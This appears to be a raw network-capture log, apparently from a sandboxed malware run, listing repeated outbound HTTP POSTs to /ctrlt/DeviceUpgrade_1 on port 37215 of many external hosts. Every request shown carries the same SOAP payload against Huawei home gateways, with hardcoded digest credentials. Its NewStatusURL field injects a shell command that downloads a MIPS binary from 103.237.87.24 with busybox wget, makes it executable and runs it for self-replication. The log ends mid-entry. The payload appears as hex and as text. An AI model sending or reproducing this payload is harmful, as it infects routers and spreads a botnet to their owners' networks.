                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2476192.168.2.1351580197.143.208.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634115934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2477192.168.2.133311641.236.140.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634125948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2478192.168.2.135984041.154.221.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634643078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2479192.168.2.1340732157.41.158.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634677887 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2480192.168.2.135470641.110.89.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634681940 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2481192.168.2.134661461.174.79.1837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634723902 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2482192.168.2.1353182139.5.7.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634782076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2483192.168.2.133406041.235.88.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634797096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2484192.168.2.1357338197.183.174.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.634797096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2485192.168.2.135951623.216.241.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.635603905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 